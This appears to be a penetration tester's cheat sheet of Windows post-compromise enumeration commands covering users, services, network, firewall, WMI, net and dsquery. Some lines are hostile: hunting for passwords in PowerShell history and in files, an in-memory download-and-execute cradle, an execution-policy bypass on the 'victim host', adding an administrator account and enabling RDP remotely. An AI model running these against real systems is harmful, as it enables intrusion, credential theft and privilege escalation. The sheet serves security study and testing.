Skip to content

Information gathering



System Information

sysinfo - [cmd / powershell]

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
System - [powershell]
path- [powershell]
windows defender - [cmd]
sc query windefend
sc – service controll Displays the domain name to which the host belongs (ran from CMD-prompt)
Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt)
set %logonserver%

User and groups


my user

whoami /priv
whoami /groups
user - [cmd]
net user
net user <user-name>
user - [powershell]
get-localuser -name <user-name> | select *
get-localuser -name <user-name> | select Name,Enabled,LastLogon
group - [cmd]
net localgroup
net localgroup <group-name>
group - [powershell]
get-localGroup | Select *
get-localGroup | ft Name
user that belong to a group - [cmd]
net localgroup <group-name>
user that belong to a grup - [powershell]
Get-LocalGroupMember Administrators | ft Name,PrincipalSource
.\accesschk.exe -uwdq "C:\Program Files\Unquoted Path Service\" 


scheduled tasks

schtasks /query /fo LIST /v
schtasks /query /fo LIST /v | findstr /v "\Microsoft"


list of processes that are mapped to a specific Windows service

tasklist /SVC


show all services running on the machine [cmd]

sc queryex type=service
show services [cmd]
wmic service
wmic service get name,startname
wmic service get name,pathname


Get-WmiObject win32_service | ?{$_.State -like 'Running'} | select Name, DisplayName, PathName
Get-WmiObject win32_service | select Name, DisplayName, PathName
Get-WmiObject win32_service | select Name, PathName
Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartMode | Where-Object {$_.State -like 'Running'}


Prints out adapter settings for the host.

ipconfig /all
Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host.
route print
Active network connections
netstat -n
netstat -r
netstat -ano
Lists all known hosts stored in the arp table.
arp -a
Test connection
Test-NetConnection -ComputerName -Port 80


Displays the status of the host's firewall. We can determine if it is active and filtering traffic.

netsh advfirewall show state    
firewall - powershell
netsh advfirewall firewall dump
netsh advfirewall firewall show rule name=all
netsh advfirewall show currentprofile
netsh advfirewall show allprofiles

netsh firewall show state
netsh firewall show config
firewall - cmd
sc query windefend
Get-NetFirewallProfile | Format-Table Name, Enabled
Get-NetFirewallRule | select DisplayName, Enabled, Description
Get-NetFirewallRule -DisplayName THM-Connection | select *

Installed Applications

application - [cmd]

wmic product get name, version, vendor
updates - [cmd]
wmic qfe get Caption, Description, HotFixID, InstalledOn
windows antyvirus
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
windows defender
Get-Service WinDefend
Get-MpComputerStatus | select RealTimeProtectionEnabled

Readable/Writable Files and Directories

accesschk.exe -uws "Everyone" "C:\Program Files"
- -u to suppress errors - -w to search for write access permissions - -s to perform a recursive search
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}


enumeration all disks

wmic logicaldisk get caption,description,providername

Device Drivers and Kernel Modules

Enunerate drivers

driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object Display Name, Start Mode, Path
get details
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

Binaries That AutoElevate

If this key is enabled HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, any user can run Windows Installer with elevated privileges.

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Directory permission

get-acl -path "C:\Program Files\Unquoted Path Service\" | Format-Table -wrap
get-acl -path "C:\Program Files\Unquoted Path Service\" | Format-List
List of files
ls -force


net view \\dc01 /all
net share

Logs and Events

get-eventlog -list

Harnessing PowerShell

Lists available modules loaded for use.


Will print the execution policy settings for each scope on a host.

Get-ExecutionPolicy -List

This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.

Set-ExecutionPolicy Bypass -Scope Process

With this string, we can get the specified user's PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt 

Return environment values such as key paths, users, computer information, etc.

Get-ChildItem Env: | ft Key,Value

Download a file from the web using PowerShell and call it from memory.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

Am I Alone?


Windows Management Instrumentation (WMI)

Prints the patch level and description of the Hotfixes applied

wmic qfe get Caption,Description,HotFixID,InstalledOn   

Displays basic host information to include any attributes within the list

wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List  

A listing of all processes on host

wmic process list /format:list  

Displays information about the Domain and Domain Controllers

wmic ntdomain list /format:list 

Displays information about all local accounts and any domain accounts that have logged into the device

wmic useraccount list /format:list  

Information about all local groups

wmic group list /format:list

Dumps information about any system accounts that are being used as service accounts.

wmic sysaccount list /format:list

Host Enumeration OS

wmic computersystem LIST full
wmic /namespace:\\root\securitycenter2 path antivirusproduct
wmic path Win32_PnPdevice 
Installed Updates
wmic qfe list brief
Directory Listing and File Search
wmic DATAFILE where "path='\\Users\\test\\Documents\\'" GET Name,readable,size

wmic DATAFILE where "drive='C:' AND Name like '%password%'" GET Name,readable,size /VALUE
Local User Accounts
wmic USERACCOUNT Get Domain,Name,Sid

Domain Enumeration Domain and DC Info

wmic NTDOMAIN GET DomainControllerAddress,DomainName,Roles /VALUE
Domain User Info
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='testAccount'" GET 
List All Users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname
List All Groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname
Members of A Group
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value

wmic path win32_groupuser where (groupcomponent=""domain admins",domain="YOURDOMAINHERE"")
List All Computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname


wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname

Execute Remote Command

wmic process call create "cmd.exe /c calc.exe"

Enable Remote Desktop

wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"


wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

Net Commands

Information about password requirements

net accounts

Password and lockout policy

net accounts /domain

Information about domain groups

net group /domain

List of users with domain admin privileges

net group "Domain Admins" /domain

List of PCs connected to the domain

net group "domain computers" /domain

List of PC accounts of domains controllers

net group "Domain Controllers" /domain

User that belongs to the group

net group <domain_group_name> /domain

List of domain groups

net groups /domain

All available groups

net localgroup

List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)

net localgroup administrators /domain

Information about a group (admins)

net localgroup Administrators

Add user to administrators

net localgroup administrators [username] /add

Check current shares

net share

Get information about a user within the domain

net user <ACCOUNT_NAME> /domain

List of all users of the domain

net user /domain

Information about the current user

net user %username%

Mount the share locally

net use x: \computer\share

Get a list of computers

net view

Shares on the domains

net view /all /domain[:domainname]

List shares of a computer

net view \computer /ALL

List of PCs of the domain

net view /domain


Dsquery is a helpful command-line tool that can be utilized to find Active Directory objects.

User Search

dsquery user

Computer Search

dsquery computer

We can use a dsquery wildcard search to view all objects in an OU.


Users With Specific Attributes Set (PASSWD_NOTREQD)

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl

Searching for Domain Controllers

dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName

Automated Enumeration




  • windows-exploit-suggester
  • /opt/windows/windows-exploit-suggester systeminfo.out -i "Elevation of Privilege" -e > exploits.txt



msf> run post/multi/recon/local_exploit_suggester